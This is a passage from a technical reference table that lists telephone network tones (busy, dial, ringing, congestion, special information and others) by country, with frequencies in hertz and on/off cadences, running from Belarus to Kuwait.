2.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on Call waiting tone - 440 2x(0.3 on 10.0 off) Belarus (Republic of) Busy tone - 425 0.4 on 0.4 off Ringing tone - 425 0.8 on 3.2 off Belgium Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.167 on 0.167 off Dial tone - 425 continuous Special dial tone - 425 1.0 on 0.25 off Holding tone - 1400 0.4 on 15.0 off Ringing tone - 425 1.0 on 3.0 off Special information tone - 900/1400/1800 3x0.33 on 1.0 off Call waiting tone - 1400 0.175 on 0.175 off 0.175 on 3.50 off Benin (Republic of) Busy tone - 440//425 0.5 on 0.5 off Congestion tone - announcement Dial tone - 440//425 continuous Special dial tone - 330+440 continuous Pay tone - announcement Ringing tone - 440//425 1.7 on 3.3 off Route tone - 440//425 0.05 on 0.05 off Special information tone - announcement Call waiting tone - 440 continuous Bermuda Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Dial tone - 350+440 continuous Ringing tone - 440+480 2.0 on 4.0 off Special information tone - 913/1428/1776 0.27 on 0.38 on 0.38 on Call waiting tone - (6) 440 Bhutan (Kingdom of) Busy tone - 400 0.6 on 0.6 off Dial tone - 400+25 continuous Number unobtainable tone - 400 continuous Offering tone, trunk - 450 0.2 on 0.2 off 0.2 on 0.6 off Ringing tone - 400+25 0.4 on 0.2 off 0.4 on 2.6 off Waiting tone - 400 0.5 on 0.25 off Botswana (Republic of) Busy tone - 400 0.375 on 0.375 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 350+450 continuous Number unobtainable tone - 400 continuous Payphone recognition tone - 1600 0.07 on 2.0 off Ringing tone - 400//450 0.4 on 0.2 off 0.4 on 2.0 off Warning tone - operator intervening 425 0.16 on 2.0 off Waiting tone - 425 0.2 on 1.0 off Brazil (Federative Republic of) Busy tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Dial tone - pabx 425 0.975 on 0.05 off Executive override tone - 750 0.02 on 1.0 off Function acknowledge tone - 425 0.1 on 0.1 off 0.1 on 2.0 off Number unobtainable tone - 425 0.75 on 0.25 off 0.25 on 0.25off Pay tone - 300 0.75 on Ringing tone - 425 1.0 on 4.0 off Waiting tone - 425 0.05 on 1.0 off Brunei Darussalam Busy tone - 400 0.375 on 0.375 off Confirmation tone - 400x24 0.1 on 0.1 off 0.3 on 0.3 off Congestion tone - 400 0.375 on 0.375 off Dial tone - 400x50 continuous Special dial tone - 400x24 0.1 on 0.1 off Holding tone - 400x24 0.5 on 2.5 off Number unobtainable tone - 400 continuous Ringing tone - 400+450 0.4 on 0.2 off 0.4 on 0.2 off Warning tone - end of period 400 0.624 on 4.376 off Warning tone - operator intervening 400 0.25 on 2.0 off Warning tone - pip tone 900 0.25 on 0.25 off Waiting tone - 400 0.3 on 0.25 off Call waiting tone - 400x24 0.5 on 0.25 off Bulgaria (Republic of) Busy tone - I 425 0.5 on 0.5 off Busy tone - II 425 0.2 on 0.5 off Busy tone - III 425 0.25 on 0.25 off Congestion tone - I 425 0.25 on 0.25 off Congestion tone - II 425 0.2 on 0.5 off Congestion tone - III 425 0.5 on 0.5 off Dial tone - I 425 continuous Dial tone - II 425 0.25 on 0.75 off 0.75 on 1.0 off Dial tone - III 425 0.25 on 0.3 off 0.7 on 0.8 off Special dial tone - 425 1.5 on 0.1 off Holding tone - 950/950/1400 0.65 on 0.32 off 0.32 on 0.32 off 1.30 on 2.60 off Intrusion tone - 425 0.25 on 0.24 off 0.24 on 1.20 off Payphone recognition tone - 1100+1750/750+1450 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - I 425 1.0 on 4.0 off Ringing tone - II 425 1.0 on 9.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone - 1400 0.35 on 0.50 off Call waiting tone - 425 0.15 on 0.15 off 0.15 on 4.0 off Burkina Faso Acceptance tone - 425 1.0 on 4.0 off Busy tone - 425//440//620 0.5 on 0.5 off Confirmation tone - 350 0128 on 0.128 off 0.384 on Congestion tone - 425//620 0.25 on 0.25 off Dial tone - 425//440 continuous Ringing tone - I 425 1.0 on 4.0 off Ringing tone - II 440 1.7 on 3.3 off Ringing tone - III 480 2.0 on 4.0 off Route tone - 425 0.05 on 0.05 off Special information tone - 900/1380/1860 0.35 on 0.30 on 0.35 on 1.0 off Burundi (Republic of) Acceptance tone - 950 continuous Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.5 on 0.5 off Dial tone - 425 continuous Special dial tone - 425 0.4 on 0.04 off Ringing tone - 425 1.7 on 3.3 off Route tone - 425 0.5 on 0.5 off Special information tone - 900 0.33 on 0.03 off Cameroon (Republic of) Busy tone - 440 0.5 on 0.5 off Congestion tone - 440 0.25 on 0.25 off Dial tone - 440 continuous Second dial tone - 330+440 continuous Pay tone - 12000 continuous Ringing tone - 440 1.7 on 3.3 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 440 0.2 on 0.6 off 0.2 on Canada Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Dial tone - 350+440 continuous Ringing tone - 440+480 2.0 on 4.0 off Call waiting tone - 440 2x(0.3 on 10.0 off) Cayman Islands Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous COUNTRY/TONE FREQUENCY in Hz CADENCE in seconds Number unobtainable tone - 425 0.25 on 0.25 off Ringing tone - 425 1.0 on 4.0 off Central African Republic Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.5 on 0.5 off Dial tone - 425 continuous Second dial tone - 425+330 continuous Number unobtainable tone - 425 0.5 on 0.5 off Pay tone - 12000 0.15 on 0.15 off Ringing tone - 425 1.7 on 3.3 off Route tone - 425 0.05 on 0.05 off Special information tone - 950/1400/1800 3x0.33 on 2x0.30 off Chile Busy tone - 400 0.5 on 0.5 off Congestion tone - 400 0.2 on 0.2 off Dial tone - 400 continuous Second dial tone - 330+440 continuous Identification tone - 800/1200 0.6 on 2.0 off 0.6 on 2.0 off Payphone recognition tone - 1100+1750/750+1450 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 400 1.0 on 3.0 off Special information tone - 950/1400/1800 3x0.333 on 1.0 off Warning tone - end of period 800 2.0 on Warning tone - operator intervening 1400 0.5 on 15.0 off Waiting tone - 900+1300 0.5 on 0.5 off China (People's Republic of) Busy tone - 450 0.35 on 0.35 off Congestion tone - 450 0.7 on 0.7 off Dial tone - 450 continuous Second dial tone - 450 continuous Intrusion tone - 450 0.2 on 0.2 off 0.2 on 0.6 off Number unobtainable tone - 450 3x(0.1 on 0.1 off) 0.4 on 0.4 off Ringing tone - 450 1.0 on 4.0 off Special information tone - I 450 0.4 on 0.04 off Special information tone - II 950 0.4 on 10.0 off Waiting tone - 450 0.4 on 4.0 off Cyprus (Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 350+450 continuous Number unobtainable tone - 425 2.5 on 0.5 off Pay tone - 1638/1206/943 3x(0.068 on 0.068 off) Ringing tone - 425 1.5 on 3.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone - operator intervening 1400 0.5 on 14.0 off Call waiting tone - 425 0.1 on 0.1 off 0.1 on 5.3 off Colombia (Republic of) Busy tone - 425 0.25 on 0.25 off Congestion tone - 425 0.10 on 0.25 off 0.35 on 0.25 off 0.65 on 0.25 off Dial tone - 425 continuous Number unobtainable tone - 425 0.65 on 0.25 off 0.20 on 0.60 off Pay tone - 50/12000/16000 0.15 on Ringing tone - 425 1.0 on 4.5 off Special information tone - 950/1400/1800 3x0.333 on 1.0 off Comoros (Islamic Federal Republic of the) Busy tone - 440 0.5 on 0.5 off Dial tone - 440 continuous Second dial tone - 330+440 continuous Ringing tone - 440 1.71 on 0.05 off Route tone - 440 0.05 on 0.05 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Korea (Republic of) Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.3 on 0.2 off Dial tone - 350+440 continuous Recall dial tone - I 400//450 1.0 on 4.0 off Recall dial tone - II 400//450 1.0 on 2.0 off Intercept tone - 350+440 0.125 on 0.25 off 0.125 on 1.5 off Number unobtainable tone - 450 0.2 on 0.1 off 0.2 on 1.5 off Ringing tone - 440+480 1.0 on 2.0 off Warning tone - operator intervening 392/494/587 2x(0.5 on 0.5 on 1.5 on) Waiting tone - 350+440 0.25 on 0.25 off 0.25 on 3.25 off Costa Rica Busy tone - 425 0.3 on 0.3 off Dial tone - 425 continuous Ringing tone - 425 1.2 on 4.6 off C�te d'Ivoire (Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - announcement Dial tone - 425 continuous Second dial tone - 440+330 continuous Line lock-out tone - 425 0.4 on 0.04 off Pay tone - 12000 Ringing tone - 425 1.5 on 3.0 off Special information tone - announcement Call waiting tone - (6) 425 Croatia (Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 0.2 on 0.3 off 0.7 on 0.8 off Payphone recognition tone - 1206/850 4x(0.2 on 0.2 off 0.2 on 0.2 off) Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.333 on 1.0 off Call waiting tone - 425 0.3 on 8.0 off Cuba Acceptance tone - 425 continuous Busy tone - 600x120//620+480//425/ 0.5 on 0.5 off /400 Congestion tone - 600x120//425//400 0.25 on 0.25 off Dial tone - I 600x120//425 continuous Dial tone - II 425 0.75 on 0.75 off 0.25 on 0.25 off Negative indication tone - 425 0.5 on 0.5 off Ringing tone - I 425 1.0 on 4.0 off Ringing tone - II 440+480//440+620//480+ 2.0 on 4.0 off 620 Ringing tone - III 420x40 1.0 on 2.0 off Ringing tone - IV 400+450 0.4 on 0.2 off 0.4 on 2.0 off Special information tone - I 950/1400/1800 (3x0.33 on 2x0.33 off) 1.0 off Special information tone - II 400 4x(0.075 on 0.10 off) 0.30 off Warning tone - I, operator 425 0.1 on 4.9 off intervening Warning tone - II,operator 425 0.5 on 0.2 off intervening Call waiting tone - I 425 0.2 on 0.6 off 0.2 on Call waiting tone - II 400 0.5 on 0.5 off Denmark Busy tone - I 425 0.25 on 0.25 off Busy tone - II (1) 425 0.5 on 0.5 off Congestion tone - I 425 0.25 on 0.25 off Congestion tone - II (1) 425 0.2 on 0.2 off Dial tone - 425 continuous Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.00 off Call waiting tone - I 425 0.2 on 0.2 off 0.2 on 3.6 off 0.2 on 0.2 off 0.2 on Call waiting tone - II (1) 425 0.2 on 0.6 off 0.2 on 3.0 off 0.2 on 0.6 off 0.2 on Diego Garcia Busy tone - 480/620 interrupted at 60 ipm Dial tone - 350/440 continuous Number unobtainable tone - 480/620 interrupted at 120 ipm Ringing tone - 440/480 1.0 on 3.0 off Djibouti (Republic of) Busy tone - 425 0.5 on 0.5 off Dial tone - 425 continuous Ringing tone - 425 1.5 on 3.5 off Route tone - 425 0.05 on 0.05 off Dominican Republic Busy tone - I 400 0.8 on 0.8 off Busy tone - II 400 0.375 on 0.375 off Congestion tone - I 400 0.8 on 0.8 off Congestion tone - II 400 0.375 on 0.375 off Dial tone - I 50 continuous Dial tone - II 33 0.0166 on 0.0166 off Number unobtainable tone - 400 continuous Ringing tone - 400//450 0.4 on 0.2 off 0.4 on 2.2 off Dominica (Commonwealth of) Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Dial tone - 350+440 continuous Ringing tone - 440+480 2.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 440 1x(0.5 on 10.0 off 0.5 on) Egypt (Arab Republic of) Busy tone - 425x50 1.0 on 4.0 off Congestion tone - 450 0.5 on 0.5 off Intrusion tone - 450 0.5 on 0.5 off Payphone recognition tone - 1100+1750/750+1450 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 425x50 2.0 on 1.0 off Special information tone - 950/1400/1800 0.33 on 0.33 off 0.33 on 0.33 off 0.33 on 0.33 off El Salvador (Republic of) Busy tone - 425 0.32 on 0.32 off Congestion tone - 425 0.32 on 0.32 off Dial tone - 425 continuous Special dial tone - 425 0.40 on 0.04 off Intrusion tone - 425 0.20 on 0.20 off 0.50 on 0.20 off Line lock-out tone - 425 0.167 on 0.167 off 0.500 on 0.167 off Ringing tone - 425 1.2 on 4.6 off Special information tone - 950/1400/1800 3x0.33 on 1.00 off Warning tone - 1400 0.20 on 0.60 off Call waiting tone - 425 0.35 on 15.0 off United Arab Emirates Busy tone - 400//425 0.375 on 0.375 off Congestion tone - 400//425 0.4 on 0.35 off 0.225 on 0.525 off Dial tone - 350+440 continuous Number unobtainable tone - 400//425 continuous Ringing tone - 400+450//425 0.4 on 0.2 off 0.4 on 2.0 off Ecuador Busy tone - 425 0.33 on 0.33 off Congestion tone - 425 0.33 on 0.33 off Dial tone - 425 continuous Ringing tone - 425 1.2 on 4.65 off Call waiting tone - 425 0.2 on 0.6 off Spain Busy tone - 425 0.2 on 0.2 off Congestion tone - 425 2x(0.2 on 0.2 off) 0.2 on 0.6 off Dial tone - 425 continuous Second dial tone - 600 continuous Special dial tone - 425 1.0 on 0.1 off Number unobtainable tone - 425 0.2 on 0.2 off 0.2 on 0.6 off Payphone recognition tone - I 1600 0.05 on 0.05 off 0.05 on 1.55 off Payphone recognition tone - II 1600 0.05 on 0.05 off 0.05 on 0.05 off 0.05 on 1.5 off Ringing tone - 425 1.5 on 3.0 off Special information tone - 950/1400/1800 3x0.333 on 1.0 off Warning tone - operator intervening 1400 0.4 on 5.0 off Call waiting tone - 425 0.175 on 0.175 off 0.175 on 3.5 off Estonia (Republic of) Busy tone - 425 0.3 on 0.3 off Congestion tone - 425 0.2 on 0.2 off Dial tone - 425 continuous Intrusion tone - 425 0.2 on 0.3 off 0.2 on 1.3 off Pay tone - 16000 0.15 on 0.35 off Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 950/1400/1800 3x0.33 on 0.3 off United States of America Busy tone - 600x120//600x133//600x 0.5 on 0.5 off 140//600x160//480+620 Confirmation tone - 350+440 3x(0.1 on 0.1 off) Dial tone - 600x120//600x133//600x continuous 140//600x160//350+440 Recall dial tone - 350+440 3x(0.1 on 0.1 off) + continuous Intrusion tone - 600x120//600x133//600x 0.5 on 0.5 off 140//600x160//480+620 Number unobtainable tone - 200//400 0.5 on 6.0 off Permanent signal tone - 480//400//500 continuous Record tone - 440 0.5 on 5.0 off Ringing tone - 420x40//500x40//440+48 2.0 on 4.0 off 0 Re-order tone - 600x120//600x133//600x 0.3 on 0.2 off 140//600x160//480+620 Warning tone - recorder (4) 1400 0.5 on Call waiting tone - 440 2x(0.3 on 10.0 off) Ethiopia (Federal Democratic Republic of) Acceptance tone - 425 continuous Busy tone - 425 0.4 on 0.4 off Congestion tone - 425 0.4 on 0.4 off Dial tone - 425 continuous Special dial tone - 425 0.4 on 0.04 off Intrusion tone - 425 0.5 on 0.2 off Line lock-out tone - 425 0.4 on 0.4 off Refusal tone - 425 0.4 on 0.4 off Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone - 1400 0.5 on 11.5 off Call waiting tone - 425 0.2 on 0.6 off Falkland Islands (Malvinas) Busy tone - 400 0.375 on 0.375 off Congestion tone - 400 0.4 on 0.35 off 0.255 on 0.525 off Dial tone - 350+450 continuous Number unobtainable tone - 400 continuous Ringing tone - 400+450 0.4 on 0.2 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone - operator intervening 1000 0.1 on 0.1 off Faroe Islands (Denmark) Busy tone - 425 0.25 on 0.25 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Number unobtainable tone - 950/1400/1800 3x0.33 on 1.0 off Ringing tone - 425 1.0 on 4.0 off Fiji (Republic of) Acceptance tone - 425 continuous Busy tone - 425 0.75 on 0.75 off Congestion tone - 425 037 on 0.37 off 0.37 on 0.37 off Dial tone - 400+450 continuous Second dial tone - 425 continuous Special dial tone - 400+450 0.40 on 0.04 off Line lock-out tone - 425 0.2 on 0.6 off 0.2 on 4.0 off Number unobtainable tone - 400 2.5 on 0.5 off Offering tone, trunk - 425 0.17 on 0.17 off 0.50 on 0.17 off Refusal tone - 425 0.24 on 0.76 off Ringing tone - 425x25 0.4 on 0.2 off 0.4 on 2.0 off Special ringing tone - 425x25 1.0 on 5.0 off 1.0 on 5.0 off Special information tone - 925/1400/1800 3x0.38 on 1.00 off Warning tone - 1400 0.5 on 12.0 off Finland Busy tone - 425 0.3 on 0.3 off Congestion tone - 425 0.2 on 0.2 off Dial tone - 425 continuous Dial tone - pabx 425 2x(0.2 on 0.3 off) 0.2 on 0.8 off Special dial tone - 425 0.65 on 0.025 off Queue tone - 950/950/1400 0.65 on 0.325 off 0.325 on 1.3 on 2.6 off Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.333 on 1.0 off Warning tone - operator intervening 425 0.2 on 0.3 off 0.2 on 1.3 off Call waiting tone - 425 0.15 on 8.0 off France Busy tone - 440 0.5 on 0.5 off Dial tone - 440//330+440 continuous Ringing tone - 440 1.5 on 3.5 off Special information tone - 950/1400/1800 3x0.3 on 1.0 off Call waiting tone - 440 2x(0.3 on 8.0 off 0.4 on 8.0 off 0.3 on 8.0 off) Gabonese Republic Busy tone - 440 0.5 on 0.5 off Congestion tone - 440 0.5 on 0.5 off Dial tone - 440 continuous Second dial tone - 330 + 440 continuous Special dial tone - 440 0.4 on 0.04 off Holding tone - 440 0.5 on 2.5 off Ringing tone - 440 1.7 on 3.3 off Special information tone - 950/1400 0.30 on 0.33 on Call waiting tone - 440 continuous Gambia (Republic of the) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.5 on 0.5 off Dial tone - 425 continuous Ringing tone - 425 1.0 on 4.0 off Special information tone - 1400 0.330 on 0.030 off Call waiting tone - 950 0.330 on 0.030 off Ghana Busy tone - 400 0.25 on 0.25 off Congestion tone - 400 0.5 on 0.5 off Dial tone - 400 continuous Holding tone - 400 0.5 on 0.5 off 0.5 on 0.25 off Number unobtainable tone - 400 0.075 on 0.1 off 0.075 on 0.1 off 0.075 on 0.4 off Ringing tone - 400 1.0 on 4.0 off Waiting tone - 400 0.5 on 0.3 on 0.2 off 0.3 on 0.2 off 3.0 off Gibraltar Busy tone - 400 0.375 on 0.375 off Congestion tone - 400 0.4 on 0.35 off 0.225 on 0.525 off Dial tone - 350+400 continuous Number unobtainable tone - 400 continuous Ringing tone - 400+450 0.4 on 0.2 off 0.4 on 2.0 off Waiting tone - 400 0.1 on 3.0 off Greece Busy tone - 425 0.3 on 0.3 off Congestion tone - 425 0.15 on 0.15 off Dial tone - 425 0.2 on 0.3 off 0.7 on 0.8 off Special dial tone - 400/425//425/450 0.2 on 0.3 off 0.7 on 0.8 off Holding tone - 900 0.5 on 0.5 off Intrusion tone - 425 0.15 on 0.25 off 0.15 on 1.45 off Number unobtainable tone - 450 continuous Ringing tone - 425 1.0 on 4.0 off Special information tone - 850/1450/1800 3x0.33 on 1.0 off Valid tone (radio-paging) - 450 0.1 on 0.1 off 0.1 on 0.7 off Call waiting tone - 425 0.3 on 10.0 off 0.3 on 10.0 off Grenada Busy tone - 460+620 0.5 on 0.5 off Congestion tone - announcement Ringing tone - 440+480 2.0 on 4.0 off Greenland (Denmark) Busy tone - 445//425 0.25 on 0.25 off Congestion tone - 445//425 0.25 on 0.25 off Dial tone - 445//425 continuous Second dial tone - 445//425 continuous Number unobtainable tone - I 950/1400/1800 3x0.33 on 1.0 off Number unobtainable tone - II 425 0.25 on 0.25 off Pay tone - 950/1400/1800 3x0.22 on 1.0 off Ringing tone - 445//425 1.0 on 4.0 off Guadeloupe (French Department of) Busy tone - 440 0.5 on 0.5 off Dial tone - 440//330+440 continuous Ringing tone - 440 1.5 on 3.5 off COUNTRY/TONE FREQUENCY in Hz CADENCE in seconds Special information tone - 950/1400/1800 3x0.3 on 1.0 off Call waiting tone - 440 2x(0.3 on 8.0 off 0.4 on 8.0 off 0.3 on 8.0 off) Guinea (Republic of) Busy tone - 450 0.2 on 0.2 off Ringing tone - 450 0.4 on 0.2 off Guyana Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.5 on 0.5 off Dial tone - 360/400 1.3 on 0.3 off 0.2 on 0.5 off Ringing tone - 425 1.75 on 3.25 off Waiting tone - 480 0.5 on 18.0 off Guiana (French Department of) Busy tone - 440 0.5 on 0.5 off Dial tone - 440//330+440 continuous Ringing tone - 440 1.5 on 3.5 off Special information tone - 950/1400/1800 3x0.3 on 1.0 off Call waiting tone - 440 2x(0.3 on 8.0 off 0.4 on 8.0 off 0.3 on 8.0 off) Honduras (Republic of) Busy tone - 440 0.5 on 0.5 off Congestion tone - 440 0.25 on 0.25 off Dial tone - 440 continuous Ringing tone - 440 1.0 on 4.0 off Call waiting tone - 440 0.5 on 0.5 off 2.0 on 4.0 off Hongkong Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Dial tone - 350+440 continuous Special dial tone - 350+440 3x(0.1 on 0.1 off) + continuous Number unobtainable tone - 480+620 continuous Ringing tone - 440+480 0.4 on 0.2 off 0.4 on 3.0 off Call waiting tone - 440 3x(0.5 on 0.5 off) Hungary (Republic of) Busy tone - 425 0.3 on 0.3 off Congestion tone - 425 0.3 on 0.3 off Dial tone - 425 continuous Second dial tone - 425+450 continuous Special dial tone - 350+375+400 continuous Negative indication tone - 300+425 0.2 on 0.2 off 0.2 on 0.2 off 0.2 on 0.2 off + announcement Offering tone, trunk - 425 0.3 on 0.3 off 0.3 on 1.5 off Pay tone - 600//1100 (3 or 5)(0.15 on 0.15 off) Positive indication tone - 300+425 1.0 on 0.2 off + announcement Payphone recognition tone - 1100+1750//750+1450 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 425 1.25 on 3.75 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone - 425 0.3 on 0.3 off 0.3 on 1.5 off Call waiting tone - 425 0.04 on 1.96 off Channel islands: Guernsey Busy tone - 400 0.375 on 0.375 off Congestion tone - 400 0.40 on 0.35 off 0.25 on 0.52 off Dial tone - 350+450 continuous Special dial tone - 350+450 0.75 on 0.75 off Pay tone - 400 0.125 on 0.125 off Ringing tone - 400+450 0.4 on 0.2 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 400 8x(0.1 on 4.9 off) Channel islands: Jersey Busy tone - 400 0.375 on 0.375 off Congestion tone - 400 0.4 on 0.35 off 0.225 on 0.525 off Dial tone - 350+450 continuous Number unobtainable tone - 400 continuous Pay tone - 400 0.125 on 0.125 off Ringing tone - 400+450 0.4 on 0.2 off 0.4 on 2.0 off Waiting tone - 400 0.1 on 2.5 off 0.1 on India (Republic of) Acceptance tone - 400 1.0 on 4.0 off Busy tone - 400 0.75 on 0.75 off Congestion tone - 400 0.25 on 0.25 off Dial tone - 400x25 continuous Special dial tone - 400+300 continuous Holding tone - 400 0.25 on 0.25 off 0.25 on 3.25 off Intrusion tone - 400 0.15 on 4.85 off Number unobtainable tone - 400 2.8 on 0.2 off Refusal tone - 400 0.25 on 0.25 off Ringing tone - I 400x25 0.4 on 0.2 off 0.4 on 2..0 off Ringing tone - II 400x25 1.0 on 2.0 off Route tone - 400 0.1 on 0.9 off Call waiting tone - 400 0.2 on 0.1 off 0.2 on 7.5 off Indonesia (Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Special dial tone - 425 4x(0.125 on 0.125 off) + continuous Howler tone - 1400 10.0 on Number unobtainable tone - 425 2.0 on 0.5 off Offering tone, trunk - 425 0.5 on 0.5 off 0.5 on 1.0 off Payphone recognition tone - 1000 5.0 on 5.0 off Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x(0.33 on 0.03 off) Call waiting tone - 425 0.15 on 0.15 off 0.15 on 10.0 off Caller waiting tone - 425 1.0 on 4.0 off Iran (Islamic Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Second dial tone - 400/425 continuous Recall dial tone - 425 continuous Holding tone - 950/950/1400 0.65 on 0.325 off 0.325 on 1.3 on 2.6 off Offering tone, trunk - 425 0.15 on 0.25 off 0.15 on 1.45 off Preemption tone - 1400 3x(0.1 on 0.1 off) Permanent signal tone - 1400 continuous Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Waiting tone - 425 0.2 on 0.2 off 0.2 on 10.0 off Iraq (Republic of) Busy tone - 400 1.0 on 1.0 off Recall dial tone - 133 0.4 on 0.2 off 0.4 on 1.5 off Ringing tone - 400 continuous Ireland Busy tone - 425 0.5 on 0.5 off Dial tone - 400//425//450 continuous Pay tone - 12000 0.12 on Ringing tone - 400+450//425 0.4 on 0.2 off 0.4 on 2.0 off Route tone - 425 0.06 on 0.06 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 425 0.18 on 0.20 off 0.20 on 4.50 off Iceland Busy tone - 425 0.25 on 0.25 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Special dial tone - (7) 425 0.4 on 0.04 off Number unobtainable tone - announcement Payphone recognition tone - 1633/1209 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 425 1.0 on 4.0 off Warning tone - 425 0.4 on 15.0 off Waiting tone - 425 4x(0.2 on 0.2 off 0.2 on 3.6 off 0.2 on 0.2 off 0.2 on) Israel (State of) Busy tone - 400 0.5 on 0.5 off Confirmation tone - I 400 1x(0.15 on 0.15 off 0.3 on) Confirmation tone - II 400 0.04 on 0.04 off Dial tone - 400 continuous Second dial tone - 400 3x(0.1 on 0.1 off) + continuous Recall dial tone - 400 3x(0.1 on 0.1 off) + continuous Special dial tone - 400 1.0 on 0.25 off Holding tone - 400 0.05 on 2.0 off Number unobtainable tone - 1000/1400/1800 3x0.333 on 1.0 off +announcement Payphone recognition tone - 1209/852 5x(0.2 on 0.2 off 0.2 on 2.0 off) Ringing tone - 400 1.0 on 3.0 off Search tone - 1004 0.01 on 1.0 off Special information tone - 1000/1400/1800 3x0.333 on 1.0 off + announcement Waiting tone - message 400 10x(0.16 on 0.16 off) + continuous Call waiting tone - 400 1x(0.15 on 10.0 off 0.15 on) Caller waiting tone - 400 2x(0.1 on 0.1 off) 0.6 on 3.0 off Italy Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.2 on 0.2 off Dial tone - 425 0.2 on 0.2 off 0.6 on 1.0 off Special dial tone - 425 continuous Ringing tone - 425 1.0 on 4.0 off Special information tone - announcement Call waiting tone - (4) 425 0.40 on 0.10 off 0.25 on 0.10 off 0.15 on Jamaica Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Dial tone - 350+440 continuous Ringing tone - 440+480 2.0 on 4.0 off Call waiting tone - 440 0.25 on 0.25 off Japan Busy tone - (3) 400 0.5 on 0.5 off Dial tone - I 400 continuous Dial tone - II, pabx 400 0.25 on 0.25 off Dial tone - III 400 0.125 on 0.125 off 0.125 on 0.125 off 0.125 on 0.125 off 0.125 on 0.125 off 0.75 on 0.25 off Second dial tone - (3) 440 0.125 on 0.125 off Pay tone - 250 0.5 on Positive indication tone - I 400 0.125 on 0.125 off 0.125 on 0.625 off Positive indication tone - II 400 0.125 on 0.125 off 0.625 on 0.125 off Ringing tone - I 400x16 1.0 on 2.0 off Ringing tone - II, pabx 400x20 1.0 on 2.0 off Call waiting tone - I 400x16/400 0.5 on 0.0~4.0 off 0.05 on 0.45 off 0.05 on 3.45 off 0.05 on 0.45 off 0.05 on 3.45 off Call waiting tone - II 400x16/400 0.1 on 0.1 off 0.1 on 3.0 off Call waiting tone - III 400x16/400 0.064 on 0.436 off 0.064 on 3.436 off Call waiting tone - IV 400x16/400 0.25 on 0.25 off 0.25 on 3.25 off Jordan (Hashemite Kingdom of) Busy tone - I 400 0.75 on 0.75 off Busy tone - II 420x40//440+400 0.5 on 0.5 off Confirmation tone - 400 20x(0.125 on 0.125 off) + continuous Congestion tone - I 420x40 0.5 on 0.5 off Congestion tone - II 400+440 0.25 on 0.25 off Dial tone - 420x40//400+440 continuous Holding tone - 420x40//400+440 0.5 on 0.5 off 0.5 on 0.25 off Number unobtainable tone - 600x120//540+660 2.5 on 0.5 off Ringing tone - I 420x40//440+400 1.2 on 4.8 off Ringing tone - II 400+16 2/3 0.4 on 0.2 off 0.4 on 2.0 off Waiting tone - 420x40//400+440 0.5 on 2x(0.3 off 0.2 on) 3.0 off Kenya (Republic of) Busy tone - 425 0.2 on 0.6 off 0.2 on 0.6 off Congestion tone - 425 0.2 on 0.6 off Dial tone - 425 continuous Pay tone - I 941 0.2 on 0.2 off Pay tone - II 800/1600 0.08 on 0.08 off Payphone recognition tone - 1633 0.08 on 1.5 off Ringing tone - 425 0.67 on 3.0 off 1.5 on 5.0 off Special information tone - 900/1400/1800 3x0.75 on 1.25 off Warning tone - operator intervening 425 0.2 on 0.2 off Call waiting tone - 425 continuous Kiribati (Republic of) Busy tone - 425 0.375 on 0.375 off Congestion tone - 425 0.375 on 0.375 off Dial tone - 425 continuous Number unobtainable tone - 425 2.5 on 0.5 off Ringing tone - 425 0.4 on 0.2 off 0.4 on 2.0 off Call waiting tone - 425 0.1 on 0.2 off 0.1 on 4.7 off Kuwait (State of) Acceptance tone - 425 continuous Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Second dial tone - 425 continuous 